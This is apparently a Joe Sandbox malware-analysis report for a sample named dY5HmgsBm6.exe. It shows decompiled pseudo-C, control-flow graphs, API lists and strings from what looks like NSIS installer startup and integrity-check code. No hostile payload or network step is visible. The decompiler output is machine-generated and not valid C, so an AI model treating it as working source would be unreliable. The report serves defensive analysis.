                                                        control_flow_graph 288 40390a-403922 call 406500 291 403924-403934 call 406055 288->291 292 403936-403967 call 405fde 288->292 301 40398a-4039b3 call 403bcf call 405b7d 291->301 296 403969-40397a call 405fde 292->296 297 40397f-403985 lstrcatA 292->297 296->297 297->301 306 4039b9-4039be 301->306 307 403a3a-403a42 call 405b7d 301->307 306->307 308 4039c0-4039e4 call 405fde 306->308 312 403a50-403a75 LoadImageA 307->312 313 403a44-403a4b call 40618a 307->313 308->307 315 4039e6-4039e8 308->315 317 403af6-403afe call 40140b 312->317 318 403a77-403aa7 RegisterClassA 312->318 313->312 319 4039f9-403a05 lstrlenA 315->319 320 4039ea-4039f7 call 405aba 315->320 331 403b00-403b03 317->331 332 403b08-403b13 call 403bcf 317->332 321 403bc5 318->321 322 403aad-403af1 SystemParametersInfoA CreateWindowExA 318->322 326 403a07-403a15 lstrcmpiA 319->326 327 403a2d-403a35 call 405a8f call 4060f7 319->327 320->319 325 403bc7-403bce 321->325 322->317 326->327 330 403a17-403a21 GetFileAttributesA 326->330 327->307 334 403a23-403a25 330->334 335 403a27-403a28 call 405ad6 330->335 331->325 341 403b19-403b33 ShowWindow call 406492 332->341 342 403b9c-403b9d call 4052f0 332->342 334->327 334->335 335->327 347 403b35-403b3a call 406492 341->347 348 403b3f-403b51 GetClassInfoA 341->348 345 403ba2-403ba4 342->345 349 403ba6-403bac 345->349 350 403bbe-403bc0 call 40140b 345->350 347->348 353 403b53-403b63 GetClassInfoA RegisterClassA 348->353 354 403b69-403b8c DialogBoxParamA call 40140b 348->354 349->331 355 403bb2-403bb9 call 40140b 349->355 350->321 353->354 358 403b91-403b9a call 40385a 354->358 355->331 358->325
                                                        C-Code - Quality: 96%
                                                        			E0040390A(void* __eflags) {
                                                        				intOrPtr _v4;
                                                        				intOrPtr _v8;
                                                        				int _v12;
                                                        				void _v16;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				intOrPtr* _t17;
                                                        				void* _t25;
                                                        				void* _t27;
                                                        				int _t28;
                                                        				void* _t31;
                                                        				int _t34;
                                                        				int _t35;
                                                        				intOrPtr _t36;
                                                        				int _t39;
                                                        				char _t57;
                                                        				CHAR* _t59;
                                                        				signed char _t63;
                                                        				CHAR* _t74;
                                                        				intOrPtr _t76;
                                                        				CHAR* _t81;
                                                        
                                                        				_t76 =  *0x42f434;
                                                        				_t17 = E00406500(2);
                                                        				_t84 = _t17;
                                                        				if(_t17 == 0) {
                                                        					_t74 = 0x42a890;
                                                        					"1033" = 0x30;
                                                        					 *0x436001 = 0x78;
                                                        					 *0x436002 = 0;
                                                        					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
                                                        					__eflags =  *0x42a890; // 0x4e
                                                        					if(__eflags == 0) {
                                                        						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
                                                        					}
                                                        					lstrcatA("1033", _t74);
                                                        				} else {
                                                        					E00406055("1033",  *_t17() & 0x0000ffff);
                                                        				}
                                                        				E00403BCF(_t71, _t84);
                                                        				_t80 = "C:\\Users\\engineer\\AppData\\Roaming\\CachemanControlPanel";
                                                        				 *0x42f4c0 =  *0x42f43c & 0x00000020;
                                                        				 *0x42f4dc = 0x10000;
                                                        				if(E00405B7D(_t84, "C:\\Users\\engineer\\AppData\\Roaming\\CachemanControlPanel") != 0) {
                                                        					L16:
                                                        					if(E00405B7D(_t92, _t80) == 0) {
                                                        						E0040618A(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
                                                        					}
                                                        					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
                                                        					 *0x42ec08 = _t25;
                                                        					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                        						L21:
                                                        						if(E0040140B(0) == 0) {
                                                        							_t27 = E00403BCF(_t71, __eflags);
                                                        							__eflags =  *0x42f4e0;
                                                        							if( *0x42f4e0 != 0) {
                                                        								_t28 = E004052F0(_t27, 0);
                                                        								__eflags = _t28;
                                                        								if(_t28 == 0) {
                                                        									E0040140B(1);
                                                        									goto L33;
                                                        								}
                                                        								__eflags =  *0x42ebec; // 0x0
                                                        								if(__eflags == 0) {
                                                        									E0040140B(2);
                                                        								}
                                                        								goto L22;
                                                        							}
                                                        							ShowWindow( *0x42a870, 5); // executed
                                                        							_t34 = E00406492("RichEd20"); // executed
                                                        							__eflags = _t34;
                                                        							if(_t34 == 0) {
                                                        								E00406492("RichEd32");
                                                        							}
                                                        							_t81 = "RichEdit20A";
                                                        							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
                                                        							__eflags = _t35;
                                                        							if(_t35 == 0) {
                                                        								GetClassInfoA(0, "RichEdit", 0x42ebc0);
                                                        								 *0x42ebe4 = _t81;
                                                        								RegisterClassA(0x42ebc0);
                                                        							}
                                                        							_t36 =  *0x42ec00; // 0x0
                                                        							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0); // executed
                                                        							E0040385A(E0040140B(5), 1);
                                                        							return _t39;
                                                        						}
                                                        						L22:
                                                        						_t31 = 2;
                                                        						return _t31;
                                                        					} else {
                                                        						_t71 =  *0x42f420;
                                                        						 *0x42ebc4 = E00401000;
                                                        						 *0x42ebd0 =  *0x42f420;
                                                        						 *0x42ebd4 = _t25;
                                                        						 *0x42ebe4 = 0x40a1f4;
                                                        						if(RegisterClassA(0x42ebc0) == 0) {
                                                        							L33:
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						}
                                                        						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                        						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
                                                        						goto L21;
                                                        					}
                                                        				} else {
                                                        					_t71 =  *(_t76 + 0x48);
                                                        					_t86 = _t71;
                                                        					if(_t71 == 0) {
                                                        						goto L16;
                                                        					}
                                                        					_t74 = 0x42e3c0;
                                                        					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
                                                        					_t57 =  *0x42e3c0; // 0x3a
                                                        					if(_t57 == 0) {
                                                        						goto L16;
                                                        					}
                                                        					if(_t57 == 0x22) {
                                                        						_t74 = 0x42e3c1;
                                                        						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
                                                        					}
                                                        					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                        					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                        						L15:
                                                        						E004060F7(_t80, E00405A8F(_t74));
                                                        						goto L16;
                                                        					} else {
                                                        						_t63 = GetFileAttributesA(_t74);
                                                        						if(_t63 == 0xffffffff) {
                                                        							L14:
                                                        							E00405AD6(_t74);
                                                        							goto L15;
                                                        						}
                                                        						_t92 = _t63 & 0x00000010;
                                                        						if((_t63 & 0x00000010) != 0) {
                                                        							goto L15;
                                                        						}
                                                        						goto L14;
                                                        					}
                                                        				}
                                                        			}

























                                                        0x00403910
                                                        0x00403919
                                                        0x00403920
                                                        0x00403922
                                                        0x00403936
                                                        0x00403948
                                                        0x0040394f
                                                        0x00403956
                                                        0x0040395c
                                                        0x00403961
                                                        0x00403967
                                                        0x0040397a
                                                        0x0040397a
                                                        0x00403985
                                                        0x00403924
                                                        0x0040392f
                                                        0x0040392f
                                                        0x0040398a
                                                        0x00403994
                                                        0x0040399d
                                                        0x004039a2
                                                        0x004039b3
                                                        0x00403a3a
                                                        0x00403a42
                                                        0x00403a4b
                                                        0x00403a4b
                                                        0x00403a61
                                                        0x00403a67
                                                        0x00403a75
                                                        0x00403af6
                                                        0x00403afe
                                                        0x00403b08
                                                        0x00403b0d
                                                        0x00403b13
                                                        0x00403b9d
                                                        0x00403ba2
                                                        0x00403ba4
                                                        0x00403bc0
                                                        0x00000000
                                                        0x00403bc0
                                                        0x00403ba6
                                                        0x00403bac
                                                        0x00403bb4
                                                        0x00403bb4
                                                        0x00000000
                                                        0x00403bac
                                                        0x00403b21
                                                        0x00403b2c
                                                        0x00403b31
                                                        0x00403b33
                                                        0x00403b3a
                                                        0x00403b3a
                                                        0x00403b45
                                                        0x00403b4d
                                                        0x00403b4f
                                                        0x00403b51
                                                        0x00403b5a
                                                        0x00403b5d
                                                        0x00403b63
                                                        0x00403b63
                                                        0x00403b69
                                                        0x00403b82
                                                        0x00403b93
                                                        0x00000000
                                                        0x00403b98
                                                        0x00403b00
                                                        0x00403b02
                                                        0x00000000
                                                        0x00403a77
                                                        0x00403a77
                                                        0x00403a83
                                                        0x00403a8d
                                                        0x00403a93
                                                        0x00403a98
                                                        0x00403aa7
                                                        0x00403bc5
                                                        0x00403bc5
                                                        0x00000000
                                                        0x00403bc5
                                                        0x00403ab6
                                                        0x00403af1
                                                        0x00000000
                                                        0x00403af1
                                                        0x004039b9
                                                        0x004039b9
                                                        0x004039bc
                                                        0x004039be
                                                        0x00000000
                                                        0x00000000
                                                        0x004039c8
                                                        0x004039d8
                                                        0x004039dd
                                                        0x004039e4
                                                        0x00000000
                                                        0x00000000
                                                        0x004039e8
                                                        0x004039ea
                                                        0x004039f7
                                                        0x004039f7
                                                        0x004039ff
                                                        0x00403a05
                                                        0x00403a2d
                                                        0x00403a35
                                                        0x00000000
                                                        0x00403a17
                                                        0x00403a18
                                                        0x00403a21
                                                        0x00403a27
                                                        0x00403a28
                                                        0x00000000
                                                        0x00403a28
                                                        0x00403a23
                                                        0x00403a25
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403a25
                                                        0x00403a05

                                                        APIs
                                                          • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                          • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                        • lstrcatA.KERNEL32(1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000,00000002,747DFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\dY5HmgsBm6.exe" ,00000000), ref: 00403985
                                                        • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\CachemanControlPanel,1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000,00000002,747DFA90), ref: 004039FA
                                                        • lstrcmpiA.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\CachemanControlPanel,1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000), ref: 00403A0D
                                                        • GetFileAttributesA.KERNEL32(: Completed), ref: 00403A18
                                                        • LoadImageA.USER32 ref: 00403A61
                                                          • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                        • RegisterClassA.USER32 ref: 00403A9E
                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                        • CreateWindowExA.USER32 ref: 00403AEB
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                        • GetClassInfoA.USER32 ref: 00403B4D
                                                        • GetClassInfoA.USER32 ref: 00403B5A
                                                        • RegisterClassA.USER32 ref: 00403B63
                                                        • DialogBoxParamA.USER32 ref: 00403B82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\dY5HmgsBm6.exe" $.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\CachemanControlPanel$Control Panel\Desktop\ResourceLocale$Name Setup: Completed$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                        • API String ID: 1975747703-575938592
                                                        • Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                        • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                        • Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                        • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 362 402ea1-402eef GetTickCount GetModuleFileNameA call 405c90 365 402ef1-402ef6 362->365 366 402efb-402f29 call 4060f7 call 405ad6 call 4060f7 GetFileSize 362->366 367 4030d1-4030d5 365->367 374 403014-403022 call 402e3d 366->374 375 402f2f 366->375 382 403024-403027 374->382 383 403077-40307c 374->383 376 402f34-402f4b 375->376 378 402f4d 376->378 379 402f4f-402f58 call 4032ea 376->379 378->379 388 40307e-403086 call 402e3d 379->388 389 402f5e-402f65 379->389 384 403029-403041 call 403300 call 4032ea 382->384 385 40304b-403075 GlobalAlloc call 403300 call 4030d8 382->385 383->367 384->383 408 403043-403049 384->408 385->383 413 403088-403099 385->413 388->383 392 402fe1-402fe5 389->392 393 402f67-402f7b call 405c4b 389->393 397 402fe7-402fee call 402e3d 392->397 398 402fef-402ff5 392->398 393->398 411 402f7d-402f84 393->411 397->398 404 403004-40300c 398->404 405 402ff7-403001 call 4065b7 398->405 404->376 412 403012 404->412 405->404 408->383 408->385 411->398 417 402f86-402f8d 411->417 412->374 414 4030a1-4030a6 413->414 415 40309b 413->415 418 4030a7-4030ad 414->418 415->414 417->398 419 402f8f-402f96 417->419 418->418 420 4030af-4030ca SetFilePointer call 405c4b 418->420 419->398 421 402f98-402f9f 419->421 424 4030cf 420->424 421->398 423 402fa1-402fc1 421->423 423->383 425 402fc7-402fcb 423->425 424->367 426 402fd3-402fdb 425->426 427 402fcd-402fd1 425->427 426->398 428 402fdd-402fdf 426->428 427->412 427->426 428->398
                                                        C-Code - Quality: 80%
                                                        			E00402EA1(void* __eflags, signed int _a4) {
                                                        				DWORD* _v8;
                                                        				DWORD* _v12;
                                                        				void* _v16;
                                                        				intOrPtr _v20;
                                                        				long _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v32;
                                                        				intOrPtr _v36;
                                                        				intOrPtr _v40;
                                                        				signed int _v44;
                                                        				long _t43;
                                                        				signed int _t50;
                                                        				void* _t57;
                                                        				intOrPtr* _t59;
                                                        				long _t60;
                                                        				signed int _t65;
                                                        				signed int _t70;
                                                        				signed int _t71;
                                                        				signed int _t77;
                                                        				intOrPtr _t80;
                                                        				long _t82;
                                                        				signed int _t85;
                                                        				signed int _t87;
                                                        				void* _t89;
                                                        				signed int _t90;
                                                        				signed int _t93;
                                                        				intOrPtr* _t94;
                                                        
                                                        				_t82 = 0;
                                                        				_v12 = 0;
                                                        				_v8 = 0;
                                                        				_t43 = GetTickCount();
                                                        				_t91 = "C:\\Users\\engineer\\Desktop\\dY5HmgsBm6.exe";
                                                        				 *0x42f430 = _t43 + 0x3e8;
                                                        				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\dY5HmgsBm6.exe", 0x400);
                                                        				_t89 = E00405C90(_t91, 0x80000000, 3);
                                                        				_v16 = _t89;
                                                        				 *0x40a018 = _t89;
                                                        				if(_t89 == 0xffffffff) {
                                                        					return "Error launching installer";
                                                        				}
                                                        				_t92 = "C:\\Users\\engineer\\Desktop";
                                                        				E004060F7("C:\\Users\\engineer\\Desktop", _t91);
                                                        				E004060F7("dY5HmgsBm6.exe", E00405AD6(_t92));
                                                        				_t50 = GetFileSize(_t89, 0);
                                                        				__eflags = _t50;
                                                        				 *0x42944c = _t50;
                                                        				_t93 = _t50;
                                                        				if(_t50 <= 0) {
                                                        					L24:
                                                        					E00402E3D(1);
                                                        					__eflags =  *0x42f438 - _t82;
                                                        					if( *0x42f438 == _t82) {
                                                        						goto L29;
                                                        					}
                                                        					__eflags = _v8 - _t82;
                                                        					if(_v8 == _t82) {
                                                        						L28:
                                                        						_t94 = GlobalAlloc(0x40, _v24);
                                                        						E00403300( *0x42f438 + 0x1c);
                                                        						_push(_v24);
                                                        						_push(_t94);
                                                        						_push(_t82);
                                                        						_push(0xffffffff); // executed
                                                        						_t57 = E004030D8(); // executed
                                                        						__eflags = _t57 - _v24;
                                                        						if(_t57 == _v24) {
                                                        							__eflags = _v44 & 0x00000001;
                                                        							 *0x42f434 = _t94;
                                                        							 *0x42f43c =  *_t94;
                                                        							if((_v44 & 0x00000001) != 0) {
                                                        								 *0x42f440 =  *0x42f440 + 1;
                                                        								__eflags =  *0x42f440;
                                                        							}
                                                        							_t40 = _t94 + 0x44; // 0x44
                                                        							_t59 = _t40;
                                                        							_t85 = 8;
                                                        							do {
                                                        								_t59 = _t59 - 8;
                                                        								 *_t59 =  *_t59 + _t94;
                                                        								_t85 = _t85 - 1;
                                                        								__eflags = _t85;
                                                        							} while (_t85 != 0);
                                                        							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                        							 *(_t94 + 0x3c) = _t60;
                                                        							E00405C4B(0x42f460, _t94 + 4, 0x40);
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						}
                                                        						goto L29;
                                                        					}
                                                        					E00403300( *0x41d440);
                                                        					_t65 = E004032EA( &_a4, 4);
                                                        					__eflags = _t65;
                                                        					if(_t65 == 0) {
                                                        						goto L29;
                                                        					}
                                                        					__eflags = _v12 - _a4;
                                                        					if(_v12 != _a4) {
                                                        						goto L29;
                                                        					}
                                                        					goto L28;
                                                        				} else {
                                                        					do {
                                                        						_t90 = _t93;
                                                        						asm("sbb eax, eax");
                                                        						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
                                                        						__eflags = _t93 - _t70;
                                                        						if(_t93 >= _t70) {
                                                        							_t90 = _t70;
                                                        						}
                                                        						_t71 = E004032EA(0x415440, _t90);
                                                        						__eflags = _t71;
                                                        						if(_t71 == 0) {
                                                        							E00402E3D(1);
                                                        							L29:
                                                        							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                        						}
                                                        						__eflags =  *0x42f438;
                                                        						if( *0x42f438 != 0) {
                                                        							__eflags = _a4 & 0x00000002;
                                                        							if((_a4 & 0x00000002) == 0) {
                                                        								E00402E3D(0);
                                                        							}
                                                        							goto L20;
                                                        						}
                                                        						E00405C4B( &_v44, 0x415440, 0x1c);
                                                        						_t77 = _v44;
                                                        						__eflags = _t77 & 0xfffffff0;
                                                        						if((_t77 & 0xfffffff0) != 0) {
                                                        							goto L20;
                                                        						}
                                                        						__eflags = _v40 - 0xdeadbeef;
                                                        						if(_v40 != 0xdeadbeef) {
                                                        							goto L20;
                                                        						}
                                                        						__eflags = _v28 - 0x74736e49;
                                                        						if(_v28 != 0x74736e49) {
                                                        							goto L20;
                                                        						}
                                                        						__eflags = _v32 - 0x74666f73;
                                                        						if(_v32 != 0x74666f73) {
                                                        							goto L20;
                                                        						}
                                                        						__eflags = _v36 - 0x6c6c754e;
                                                        						if(_v36 != 0x6c6c754e) {
                                                        							goto L20;
                                                        						}
                                                        						_a4 = _a4 | _t77;
                                                        						_t87 =  *0x41d440; // 0x27469f
                                                        						 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
                                                        						_t80 = _v20;
                                                        						__eflags = _t80 - _t93;
                                                        						 *0x42f438 = _t87;
                                                        						if(_t80 > _t93) {
                                                        							goto L29;
                                                        						}
                                                        						__eflags = _a4 & 0x00000008;
                                                        						if((_a4 & 0x00000008) != 0) {
                                                        							L16:
                                                        							_v8 = _v8 + 1;
                                                        							_t24 = _t80 - 4; // 0x40a194
                                                        							_t93 = _t24;
                                                        							__eflags = _t90 - _t93;
                                                        							if(_t90 > _t93) {
                                                        								_t90 = _t93;
                                                        							}
                                                        							goto L20;
                                                        						}
                                                        						__eflags = _a4 & 0x00000004;
                                                        						if((_a4 & 0x00000004) != 0) {
                                                        							break;
                                                        						}
                                                        						goto L16;
                                                        						L20:
                                                        						__eflags = _t93 -  *0x42944c; // 0x2746a3
                                                        						if(__eflags < 0) {
                                                        							_v12 = E004065B7(_v12, 0x415440, _t90);
                                                        						}
                                                        						 *0x41d440 =  *0x41d440 + _t90;
                                                        						_t93 = _t93 - _t90;
                                                        						__eflags = _t93;
                                                        					} while (_t93 != 0);
                                                        					_t82 = 0;
                                                        					__eflags = 0;
                                                        					goto L24;
                                                        				}
                                                        			}






























                                                        0x00402ea9
                                                        0x00402eac
                                                        0x00402eaf
                                                        0x00402eb2
                                                        0x00402eb8
                                                        0x00402ec9
                                                        0x00402ece
                                                        0x00402ee1
                                                        0x00402ee6
                                                        0x00402ee9
                                                        0x00402eef
                                                        0x00000000
                                                        0x00402ef1
                                                        0x00402efc
                                                        0x00402f02
                                                        0x00402f13
                                                        0x00402f1a
                                                        0x00402f20
                                                        0x00402f22
                                                        0x00402f27
                                                        0x00402f29
                                                        0x00403014
                                                        0x00403016
                                                        0x0040301b
                                                        0x00403022
                                                        0x00000000
                                                        0x00000000
                                                        0x00403024
                                                        0x00403027
                                                        0x0040304b
                                                        0x00403056
                                                        0x00403061
                                                        0x00403066
                                                        0x00403069
                                                        0x0040306a
                                                        0x0040306b
                                                        0x0040306d
                                                        0x00403072
                                                        0x00403075
                                                        0x00403088
                                                        0x0040308c
                                                        0x00403094
                                                        0x00403099
                                                        0x0040309b
                                                        0x0040309b
                                                        0x0040309b
                                                        0x004030a3
                                                        0x004030a3
                                                        0x004030a6
                                                        0x004030a7
                                                        0x004030a7
                                                        0x004030aa
                                                        0x004030ac
                                                        0x004030ac
                                                        0x004030ac
                                                        0x004030b6
                                                        0x004030bc
                                                        0x004030ca
                                                        0x004030cf
                                                        0x00000000
                                                        0x004030cf
                                                        0x00000000
                                                        0x00403075
                                                        0x0040302f
                                                        0x0040303a
                                                        0x0040303f
                                                        0x00403041
                                                        0x00000000
                                                        0x00000000
                                                        0x00403046
                                                        0x00403049
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f2f
                                                        0x00402f34
                                                        0x00402f39
                                                        0x00402f3d
                                                        0x00402f44
                                                        0x00402f49
                                                        0x00402f4b
                                                        0x00402f4d
                                                        0x00402f4d
                                                        0x00402f51
                                                        0x00402f56
                                                        0x00402f58
                                                        0x00403080
                                                        0x00403077
                                                        0x00000000
                                                        0x00403077
                                                        0x00402f5e
                                                        0x00402f65
                                                        0x00402fe1
                                                        0x00402fe5
                                                        0x00402fe9
                                                        0x00402fee
                                                        0x00000000
                                                        0x00402fe5
                                                        0x00402f6e
                                                        0x00402f73
                                                        0x00402f76
                                                        0x00402f7b
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f7d
                                                        0x00402f84
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f86
                                                        0x00402f8d
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f8f
                                                        0x00402f96
                                                        0x00000000
                                                        0x00000000
                                                        0x00402f98
                                                        0x00402f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00402fa1
                                                        0x00402fa7
                                                        0x00402fb0
                                                        0x00402fb6
                                                        0x00402fb9
                                                        0x00402fbb
                                                        0x00402fc1
                                                        0x00000000
                                                        0x00000000
                                                        0x00402fc7
                                                        0x00402fcb
                                                        0x00402fd3
                                                        0x00402fd3
                                                        0x00402fd6
                                                        0x00402fd6
                                                        0x00402fd9
                                                        0x00402fdb
                                                        0x00402fdd
                                                        0x00402fdd
                                                        0x00000000
                                                        0x00402fdb
                                                        0x00402fcd
                                                        0x00402fd1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00402fef
                                                        0x00402fef
                                                        0x00402ff5
                                                        0x00403001
                                                        0x00403001
                                                        0x00403004
                                                        0x0040300a
                                                        0x0040300a
                                                        0x0040300a
                                                        0x00403012
                                                        0x00403012
                                                        0x00000000
                                                        0x00403012

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402EB2
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\dY5HmgsBm6.exe,00000400), ref: 00402ECE
                                                          • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dY5HmgsBm6.exe,80000000,00000003), ref: 00405C94
                                                          • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                        • GetFileSize.KERNEL32(00000000,00000000,dY5HmgsBm6.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\dY5HmgsBm6.exe,C:\Users\user\Desktop\dY5HmgsBm6.exe,80000000,00000003), ref: 00402F1A
                                                        • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\dY5HmgsBm6.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\dY5HmgsBm6.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$dY5HmgsBm6.exe$soft
                                                        • API String ID: 2803837635-1120317479
                                                        • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                        • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                        • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                        • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
